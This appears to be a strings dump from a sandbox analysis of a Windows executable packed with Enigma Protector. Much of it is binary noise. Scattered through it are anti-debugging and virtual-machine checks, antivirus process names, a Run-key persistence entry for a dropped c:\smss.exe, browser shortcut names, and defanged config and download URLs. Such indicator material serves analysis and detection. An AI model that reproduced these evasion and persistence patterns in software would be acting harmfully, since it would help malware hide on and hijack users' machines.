EP_RegKeyGlobalTimeLeft
EP_RegKeyRegisterAfterDate
EP_RegKeyRegisterAfterDateEx
EP_RegKeyRegisterBeforeDate
EP_RegKeyRegisterBeforeDateEx
EP_TrialExecutions
EP_TrialExecutionsTotal
EP_TrialExecutionsLeft
EP_TrialExecutionTime
EP_TrialExecutionTimeTotal
EP_TrialExecutionTimeLeft
EP_RegCheckKeyEx
EP_RegSaveKeyEx
EP_RegLoadKeyEx
EP_CheckUpStartupPasswordHashString
EP_ProtectedStringByKey
EP_RegKeyInformation
EP_RegKeyInformationA
EP_RegKeyInformationW
EP_RegKeyStatus
DLL_Loader_Import_Unit
TInitImport
Could not load library: %s
Function %s not found in module %s
File not found: %s
Can't find DLL entry point %s in %s
"%s" %s
%s %s
mscorwks.dll
mscoreei.dll
%Xv_F5
<-7}G
.uJ>X
3%S;C
coRegistratioKey
ZwOpenKey
ZwEnumerateValueKey
ZwQueryKey
ZwQueryValueKey
ZwCreateKey
ZwEnumerateKey
ZwSetValueKey
ZwDeleteKey
ZwDeleteValueKey
ZwFlushKey
ZwLoadKey
ZwLoadKey2
ZwNotifyChangeKey
ZwQueryMultipleValueKey
ZwReplaceKey
ZwRestoreKey
ZwSaveKey
ZwSetInformationKey
ZwUnloadKey
ZwOpenKeyEx
ZwQuerySection, Unsupported class %d
KeySetValue unsupported value type
ZwQueryValueKey, unsupported class %d
ZwQueryKey, unsupported class %d
ZwQueryObject with unsupported class
ZwReadFileInformation with unsupported class
ZwSetInformationFile with unsupported class
sxs.dll
THookWindowsAPI
%XT#B%
\\.\NTICE
\\.\SICE
\\.\SIWDEBUG
%s\%.8x%.8x-%.8x%.8x
)TEnigmaProtectorLoaderFormStartuppassword
)TEnigmaProtectorLoaderFormStartuppassword(*n
DLL_Loader_RunPassword_Unit
decrypt_on_execute_begin
ECRONEXECB
decrypt_on_execute_end
ECRONEXECE
.section
DLL_Loader.dll
@``@``@``@``@``@``@``@
@``@``@``@``@``
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
_enigma_keygen_routines
TntWindows
UrlMon
virtualboximportunit
KeyRoutines
nJwaWindows
 DLL_Loader_Import_Unit
.lpMs"p
P..sK
g{.hi
4%u^t
\ps|%f.
`X%czf
\ .tO
7[.SA
m%chd
$.BLy
.ESq`
-iftP8
>p.jWPm
q%U~Kk/
HuRl
"G.oR
mH%Ct
C*.LZ
version.dll
shell32.dll
SHFolder.dll
shlwapi.dll
GetWindowsDirectoryW
GetWindowsDirectoryA
GetCPInfo
GetKeyboardType
VkKeyScanW
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExA
MapVirtualKeyW
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextW
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
SetViewportOrgEx
ShellExecuteW
ShellExecuteA
5!5%5)5-51555
? ?$?(?,?0?4?8?
9!9%9)9-919
6#6'6 6/6
5 5$5(5,50545
;#;'; ;/;3;7;
9 9$9(9,90949
8$9(9,909
7 7$7(7,7
7 7$7(767>7
<$<9<=<_<
9!9%9)9-9195999
9#9 9<9\9
: :(:,:0:4:|:
rasapi32.dll
winspool.drv
oledlg.dll
ws2_32.dll
.Rt&#
l]!.QQ
HtlGs}%u
_nX%SX
Keyw~
>h.MR
%s_4d
W:\3rdpa
.TSC{
hI%F"
Prkey
.Rdj;)
P{rþ_)
F.hqO
*;<=>@[]
3UDPT
xport
.SGlf,I
vZED-S}
6<Tj%S[u
%u<x$P&
(s^%f
8@ý
Q?%uf
<.CX$
%Dhk\L
%X0`W
&%F!"
YÀ_6T%s4_
o%FQ3
].t%CTQ
8"h%s
.Vj!'
!.dh:J)
%SA <<
MAIN%C
w%Ud!
 x.LG
%ul;T'
.LLI^
@keys
34567890
]U.av
?,?3:4;8'9
YS~.DZ
%s2 (
uj\%s
%uFW%
%c)]!
Ê[n
-%F W
CrTSh
dp("%s
.ei$uK
TbG.ly
JYGN%u
.hf~z j
* ,-./01
.wQxqe2
ÞFAU
KW.HK
k.TBh -q
-uuEn},
E.HTD
s%upC(
(%fjb
0TCPG
.xOuN
&t .zw
.Dp#}
23456789
8$4,6-9'
G"%D.
\.Gr8
(!q%SP
"%D 1
%SEo\
n0l32.ud
%Fsp!
%UA)(
_A.tr*
By%cJ
u%F!-
D-g%s
1%CwF
Z2-Y}
8%S(J
-$.Sh
F&
.lD`F$<aG
rDT%Ur
bJSXK
TZ .HF
SrRf%u
X%czf
ÛS@yR6
o.PU#
%6sV(x
9Oh~Î
#_?@7/6-
DZ\%u
7V.Xx
p.jWPm
dc|ô
.Kj2H
J4.dQ
y.nC@
:#;'< =/>
T>.TZr`
.RK^'G
t?L.PZ^~x~|]
'NX.Nk
3MlL%U
%Cp<t
q6%f.Z
(.zZ%
?-?1%5}$
Site : hXXp://VVV.enigmaprotector.com/
E-mail : [email protected]
Lisence holder: %s
I.DPDjD
(*.*)
1.4.0.0
%Cookies FOLDER%
Unspecified error (%d) from %s.
debug.log
enigma_ide.dll
ÚysToKeyExp%
%RegKey%
%KeyExpYear%
%KeyExpMonth%
%KeyExpDay%
%CU_EXTFILES%
%CU_EXECPR%
%CU_INSTSERV%
%CU_WINVER%
%CU_VIRTTOOLS%
%TrialExecsTotal%
%TrialExecsLeft%
%TrialExecMinsTotal%
%TrialExecMinsLeft%
hh.exe
write.exe
attrib.exe
chkdsk.exe
compact.exe
find.exe
help.exe
winver.exe
regsvr32.exe
replace.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
Was not able to create virtual value at ImportCall_ZwSetValueKey
Was not able to create virtual key at ImportCall_ZwSetValueKey
ImportCall_ZwLoadKey
ImportCall_ZwLoadKey2
ImportCall_ZwNotifyChangeKey
ImportCall_ZwQueryMultipleValueKey
ImportCall_ZwReplaceKey
ImportCall_ZwRestoreKey
ImportCall_ZwSaveKey
ImportCall_ZwSetInformationKey
ImportCall_ZwUnloadKey
evb*.tmp
.manifest
Unsupported call of ZwSetVolumeInformationFile
\device\harddiskvolume1\test6\wait.htm
Application requires password to start
Enter password
Change password
New password:
Confirm new password:
% )*0./(&'312-,
RichEdit line insertion error=This control requires version 4.70 or greater of COMCTL32.DLL
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt  Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread creation error: %s
Thread Error: %s (%d)7CreateClone not implemented for class %s with source %s
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Ancestor for '%s' not found
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

%original file name%.exe_912_rwx_00401000_001FC000:

t$(SSh
~%UVW
u$SShe
wininet.dll
winmm.dll
ole32.dll
user32.dll
OLEACC.DLL
gdiplus.dll
kernel32.dll
gdi32.dll
advapi32.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
GdiplusShutdown
MsgWaitForMultipleObjects
RegCreateKeyA
RegOpenKeyA
RegEnumKeyA
RegCloseKey
RegFlushKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
QQPCTray.exe
360tray.exe
c:\smss.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss
%Program Files%\Internet Explorer\iexplore.exe
6.lnk
7.lnk
chrome.lnk
chrome
Opera.lnk
Opera
Mozilla Firefox.lnk
Mozilla Firefox
Google Chrome.lnk
Google Chrome
config.ini
.html
hXXp://56.doudousoft.com/ini/oem/
hXXp://56.doudousoft.com/ini/liuliang/gengxin.html
hXXp://56.doudousoft.com/ini/liuliang/config.html
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
https
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
hXXps://
hXXp://
[email protected]
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
text|password|file
comdlg32.dll
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
P!T%s
.eW7,
,hV.ke
/&%FiAm
.dqg{}
6f/w.dy
k>.XN
al.OU=?Z
.rik[
9.cY"
v,>.RGj9
 I.yI,s
m<)x.VQ&
%rf.%X
s.GE-
.VIVk
O$f.iWe_
;m.xa
Z^Mz.gi
$%H%U
m>%F[gb
J#.NN
@#f.yT
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
HTTP/1.0
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
(*.htm;*.html)|*.htm;*.html
its:%s::%s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
zcÁ
%original file name%.exe
<META http-equiv=Content-Type content="text-html; charset=Windows-1252"></HEAD>
<TD id=tableProps vAlign=top align=left><IMG id=pagerrorImg height=33 src="pagerror.gif" width=25></TD>
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
I.DPDjD

%original file name%.exe_912_rwx_00600000_002B6000:

.idata
.edata
P.reloc
P.rsrc
.reloc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
.Owner
W:\3rdparty\ScreamSec\SecUtils.pas
TCipher.CreateIntf: Algorithm mismatch
TBlockCipher.CreateIntf: Wrong VectorSize
Cipher mode not supported
The vector for %s is %d blocks. Cannot initialize with a %d block vector.
The block size for %s is %d bytes and the key is %d bytes. Cannot initialize with a %d block vector.
The minimum key and IV size for %s is %d bytes.
Not supported
TRijndael_PipedPCFB
Rijndael: Invalid key size - %d
2.16.840.1.101.3.4.1.1
2.16.840.1.101.3.4.1.21
2.16.840.1.101.3.4.1.41
1.3.6.1.4.1.13085.1.22
1.3.6.1.4.1.13085.1.23
1.3.6.1.4.1.13085.1.24
2.16.840.1.101.3.4.1.4
2.16.840.1.101.3.4.1.24
2.16.840.1.101.3.4.1.44
1.3.6.1.4.1.13085.1.7
1.3.6.1.4.1.13085.1.8
1.3.6.1.4.1.13085.1.9
1.3.6.1.4.1.13085.1.4
1.3.6.1.4.1.13085.1.5
1.3.6.1.4.1.13085.1.6
1.3.6.1.4.1.13085.1.10
1.3.6.1.4.1.13085.1.11
1.3.6.1.4.1.13085.1.12
1.3.6.1.4.1.13085.1.1
1.3.6.1.4.1.13085.1.2
1.3.6.1.4.1.13085.1.3
1.3.6.1.4.1.13085.1.16
1.3.6.1.4.1.13085.1.17
1.3.6.1.4.1.13085.1.18
2.16.840.1.101.3.4.1.2
2.16.840.1.101.3.4.1.22
2.16.840.1.101.3.4.1.42
1.3.6.1.4.1.13085.1.19
1.3.6.1.4.1.13085.1.20
1.3.6.1.4.1.13085.1.21
2.16.840.1.101.3.4.1.3
2.16.840.1.101.3.4.1.23
2.16.840.1.101.3.4.1.43
2.16.840.1.101.3.4.1.5
2.16.840.1.101.3.4.1.25
2.16.840.1.101.3.4.1.45
/* Dr Brian Gladman ([email protected]) 14th January 1999 */
TGenerator.Create: Cipher mode must be cmCTR.
TMPPool.CheckThreadID: Called from the wrong thread.
TMPPool.Cache: Invalid pointer
TMPPool.Obtain: Out of memory
TMPPool.InternalCheck: Invalid pointer
Portugal
Turkey
TKeyVerifyParams
12345678-
.Rdj)
Windows 95
WIN_VER_WINDOWS95
Windows 95 OSR2
WIN_VER_WINDOWS95OSR2
Windows 98
WIN_VER_WINDOWS98
Windows 98 SE
WIN_VER_WINDOWS98SE
Windows ME
WIN_VER_WINDOWSME
Windows 2000
WIN_VER_WINDOWS2000
Windows 2000 Professional
WIN_VER_WINDOWS2000PROF
Windows 2000 Data Server
WIN_VER_WINDOWS2000DATASERVER
Windows 2000 Advanced Server
WIN_VER_WINDOWS2000ADVSERVER
Windows 2000 Server
WIN_VER_WINDOWS2000SERVER
Windows XP
WIN_VER_WINDOWSXP
Windows XP Home
WIN_VER_WINDOWSXPHOME
Windows XP Professional
WIN_VER_WINDOWSXPPROF
Windows XP Professional x64
WIN_VER_WINDOWSXPPROFx64
Windows XP Professional Datacenter x64
WIN_VER_WINDOWSXPPROFDATACENTERx64
Windows XP Professional Enterprise x64
WIN_VER_WINDOWSXPPROFENERPRICEx64
Windows XP Professional Standart x64
WIN_VER_WINDOWSXPPROFSTANDARTx64
Windows 2003
Windows 2003 Server
WIN_VER_WINDOWS2003SERVER
Windows 2003 Server R2
WIN_VER_WINDOWS2003SERVERR2
Windows 2003 Storage Server
WIN_VER_WINDOWS2003STORAGESERVER
Windows 2003 Datacenter Itanium
WIN_VER_WINDOWS2003DATACENTERITANIUM
Windows 2003 Enterprise Itanium
WIN_VER_WINDOWS2003ENTERPRICEITANIUM
Windows 2003 Datacenter x64
WIN_VER_WINDOWS2003DATACENTERx64
Windows 2003 Enterprise x64
WIN_VER_WINDOWS2003ENERPRICEx64
Windows 2003 Standart x64
WIN_VER_WINDOWS2003STANDARTx64
Windows 2003 Compute
WIN_VER_WINDOWS2003COMPUTE
Windows 2003 Datacenter
WIN_VER_WINDOWS2003DATACENTER
Windows 2003 Enterprise
WIN_VER_WINDOWS2003ENTERPRICE
Windows 2003 Web
WIN_VER_WINDOWS2003WEB
Windows 2003 Standart
WIN_VER_WINDOWS2003STANDART
Windows Vista
WIN_VER_WINDOWSVISTA
Windows Vista Business
WIN_VER_WINDOWSVISTA_BUSINESS
Windows Vista Cluster Server
WIN_VER_WINDOWSVISTA_CLUSTER_SERVER
Windows Vista Datacenter Server
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER
Windows Vista Datacenter Server Core
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_CORE
Windows Vista Datacenter Server Core V
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_CORE_V
Windows Vista Datacenter Server V
WIN_VER_WINDOWSVISTA_DATACENTER_SERVER_V
Windows Vista Enterprise
WIN_VER_WINDOWSVISTA_ENTERPRICE
Windows Vista Enterprise Server
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER
Windows Vista Enterprise Server Core
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_CORE
Windows Vista Enterprise Server V
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_V
Windows Vista Enterprise Server Core V
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_CORE_V
Windows Vista Enterprise Server IA64
WIN_VER_WINDOWSVISTA_ENTERPRISE_SERVER_IA64
Windows Vista Home Basic
WIN_VER_WINDOWSVISTA_HOME_BASIC
Windows Vista Home Premium
WIN_VER_WINDOWSVISTA_HOME_PREMIUM
Windows Vista Home Server
WIN_VER_WINDOWSVISTA_HOME_SERVER
Windows Vista Server For Small Business
WIN_VER_WINDOWSVISTA_SERVER_FOR_SMALLBUSINESS
Windows Vista Small Business Server
WIN_VER_WINDOWSVISTA_SMALLBUSINESS_SERVER
Windows Vista Small Business Server Premium
WIN_VER_WINDOWSVISTA_SMALLBUSINESS_SERVER_PREMIUM
Windows Vista Medium Business Server Management
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows Vista Medium Business Server Messaging
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_MESSAGING
Windows Vista Medium Business Server Security
WIN_VER_WINDOWSVISTA_MEDIUMBUSINESS_SERVER_SECURITY
Windows Vista Standard Server
WIN_VER_WINDOWSVISTA_STANDARD_SERVER
Windows Vista Standard Server V
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_V
Windows Vista Standard Server Core
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_CORE
Windows Vista Standard Server Core V
WIN_VER_WINDOWSVISTA_STANDARD_SERVER_CORE_V
Windows Vista Starter
WIN_VER_WINDOWSVISTA_STARTER
Windows Vista Storage Enterprise Server
WIN_VER_WINDOWSVISTA_STORAGE_ENTERPRISE_SERVER
Windows Vista Storage Express Server
WIN_VER_WINDOWSVISTA_STORAGE_EXPRESS_SERVER
Windows Vista Storage Standard Server
WIN_VER_WINDOWSVISTA_STORAGE_STANDARD_SERVER
Windows Vista Storage Workgroup Server
WIN_VER_WINDOWSVISTA_STORAGE_WORKGROUP_SERVER
Windows Vista Undefined
WIN_VER_WINDOWSVISTA_UNDEFINED
Windows Vista Ultimate
WIN_VER_WINDOWSVISTA_ULTIMATE
Windows Vista Web Server
WIN_VER_WINDOWSVISTA_WEB_SERVER
Windows Vista Web Server Core
WIN_VER_WINDOWSVISTA_WEB_SERVER_CORE
Windows Vista Unlicensed
WIN_VER_WINDOWSVISTA_UNLICENSED
Windows 2008
WIN_VER_WINDOWS2008
Windows 2008 Business
WIN_VER_WINDOWS2008_BUSINESS
Windows 2008 Cluster Server
WIN_VER_WINDOWS2008_CLUSTER_SERVER
Windows 2008 Datacenter Server
WIN_VER_WINDOWS2008_DATACENTER_SERVER
Windows 2008 Datacenter Server Core
WIN_VER_WINDOWS2008_DATACENTER_SERVER_CORE
Windows 2008 Datacenter Server Core V
WIN_VER_WINDOWS2008_DATACENTER_SERVER_CORE_V
Windows 2008 Datacenter Server V
WIN_VER_WINDOWS2008_DATACENTER_SERVER_V
Windows 2008 Enterprise
WIN_VER_WINDOWS2008_ENTERPRICE
Windows 2008 Enterprise Server
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER
Windows 2008 Enterprise Server Core
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_CORE
Windows 2008 Enterprise Server V
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_V
Windows 2008 Enterprise Server Core V
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_CORE_V
Windows 2008 Enterprise Server IA64
WIN_VER_WINDOWS2008_ENTERPRISE_SERVER_IA64
Windows 2008 Home Basic
WIN_VER_WINDOWS2008_HOME_BASIC
Windows 2008 Home Premium
WIN_VER_WINDOWS2008_HOME_PREMIUM
Windows 2008 Home Server
WIN_VER_WINDOWS2008_HOME_SERVER
Windows 2008 Server For Small Business
WIN_VER_WINDOWS2008_SERVER_FOR_SMALLBUSINESS
Windows 2008 Small Business Server
WIN_VER_WINDOWS2008_SMALLBUSINESS_SERVER
Windows 2008 Small Business Server Premium
WIN_VER_WINDOWS2008_SMALLBUSINESS_SERVER_PREMIUM
Windows 2008 Medium Business Server Management
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 2008 Medium Business Server Messaging
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 2008 Medium Business Server Security
WIN_VER_WINDOWS2008_MEDIUMBUSINESS_SERVER_SECURITY
Windows 2008 Standard Server
WIN_VER_WINDOWS2008_STANDARD_SERVER
Windows 2008 Standard Server V
WIN_VER_WINDOWS2008_STANDARD_SERVER_V
Windows 2008 Standard Server Core
WIN_VER_WINDOWS2008_STANDARD_SERVER_CORE
Windows 2008 Standard Server Core V
WIN_VER_WINDOWS2008_STANDARD_SERVER_CORE_V
Windows 2008 Starter
WIN_VER_WINDOWS2008_STARTER
Windows 2008 Storage Enterprise Server
WIN_VER_WINDOWS2008_STORAGE_ENTERPRISE_SERVER
Windows 2008 Storage Express Server
WIN_VER_WINDOWS2008_STORAGE_EXPRESS_SERVER
Windows 2008 Storage Standard Server
WIN_VER_WINDOWS2008_STORAGE_STANDARD_SERVER
Windows 2008 Storage Workgroup Server
WIN_VER_WINDOWS2008_STORAGE_WORKGROUP_SERVER
Windows 2008 Undefined
WIN_VER_WINDOWS2008_UNDEFINED
Windows 2008 Ultimate
WIN_VER_WINDOWS2008_ULTIMATE
Windows 2008 Web Server
WIN_VER_WINDOWS2008_WEB_SERVER
Windows 2008 Web Server Core
WIN_VER_WINDOWS2008_WEB_SERVER_CORE
Windows 2008 Unlicensed
WIN_VER_WINDOWS2008_UNLICENSED
Windows 2008 R2
WIN_VER_WINDOWS2008R2
Windows 2008 R2 Business
WIN_VER_WINDOWS2008R2_BUSINESS
Windows 2008 R2 Cluster Server
WIN_VER_WINDOWS2008R2_CLUSTER_SERVER
Windows 2008 R2 Datacenter Server
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER
Windows 2008 R2 Datacenter Server Core
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_CORE
Windows 2008 R2 Datacenter Server Core V
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_CORE_V
Windows 2008 R2 Datacenter Server V
WIN_VER_WINDOWS2008R2_DATACENTER_SERVER_V
Windows 2008 R2 Enterprise
WIN_VER_WINDOWS2008R2_ENTERPRICE
Windows 2008 R2 Enterprise Server
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER
Windows 2008 R2 Enterprise Server Core
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_CORE
Windows 2008 R2 Enterprise Server V
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_V
Windows 2008 R2 Enterprise Server Core V
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_CORE_V
Windows 2008 R2 Enterprise Server IA64
WIN_VER_WINDOWS2008R2_ENTERPRISE_SERVER_IA64
Windows 2008 R2 Home Basic
WIN_VER_WINDOWS2008R2_HOME_BASIC
Windows 2008 R2 Home Premium
WIN_VER_WINDOWS2008R2_HOME_PREMIUM
Windows 2008 R2 Home Server
WIN_VER_WINDOWS2008R2_HOME_SERVER
Windows 2008 R2 Server For Small Business
WIN_VER_WINDOWS2008R2_SERVER_FOR_SMALLBUSINESS
Windows 2008 R2 Small Business Server
WIN_VER_WINDOWS2008R2_SMALLBUSINESS_SERVER
Windows 2008 R2 Small Business Server Premium
WIN_VER_WINDOWS2008R2_SMALLBUSINESS_SERVER_PREMIUM
Windows 2008 R2 Medium Business Server Management
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_MANAGEMENT
Windows 2008 R2 Medium Business Server Messaging
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_MESSAGING
Windows 2008 R2 Medium Business Server Security
WIN_VER_WINDOWS2008R2_MEDIUMBUSINESS_SERVER_SECURITY
Windows 2008 R2 Standard Server
WIN_VER_WINDOWS2008R2_STANDARD_SERVER
Windows 2008 R2 Standard Server V
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_V
Windows 2008 R2 Standard Server Core
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_CORE
Windows 2008 R2 Standard Server Core V
WIN_VER_WINDOWS2008R2_STANDARD_SERVER_CORE_V
Windows 2008 R2 Starter
WIN_VER_WINDOWS2008R2_STARTER
Windows 2008 R2 Storage Enterprise Server
WIN_VER_WINDOWS2008R2_STORAGE_ENTERPRISE_SERVER
Windows 2008 R2 Storage Express Server
WIN_VER_WINDOWS2008R2_STORAGE_EXPRESS_SERVER
Windows 2008 R2 Storage Standard Server
WIN_VER_WINDOWS2008R2_STORAGE_STANDARD_SERVER
Windows 2008 R2 Storage Workgroup Server
WIN_VER_WINDOWS2008R2_STORAGE_WORKGROUP_SERVER
Windows 2008 R2 Undefined
WIN_VER_WINDOWS2008R2_UNDEFINED
Windows 2008 R2 Ultimate
WIN_VER_WINDOWS2008R2_ULTIMATE
Windows 2008 R2 Web Server
WIN_VER_WINDOWS2008R2_WEB_SERVER
Windows 2008 R2 Web Server Core
WIN_VER_WINDOWS2008R2_WEB_SERVER_CORE
Windows 2008 R2 Unlicensed
WIN_VER_WINDOWS2008R2_UNLICENSED
Windows 7
WIN_VER_WINDOWSSEVEN
Windows 7 Business
WIN_VER_WINDOWSSEVEN_BUSINESS
Windows 7 Cluster Server
WIN_VER_WINDOWSSEVEN_CLUSTER_SERVER
Windows 7 Datacenter Server
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER
Windows 7 Datacenter Server Core
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_CORE
Windows 7 Datacenter Server Core V
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_CORE_V
Windows 7 Datacenter Server V
WIN_VER_WINDOWSSEVEN_DATACENTER_SERVER_V
Windows 7 Enterprise
WIN_VER_WINDOWSSEVEN_ENTERPRICE
Windows 7 Enterprise Server
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER
Windows 7 Enterprise Server Core
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_CORE
Windows 7 Enterprise Server V
WIN_VER_WINDOWSSEVEN_ENTERPRISE_SERVER_V
Windows 7 Enterprise Server Core V
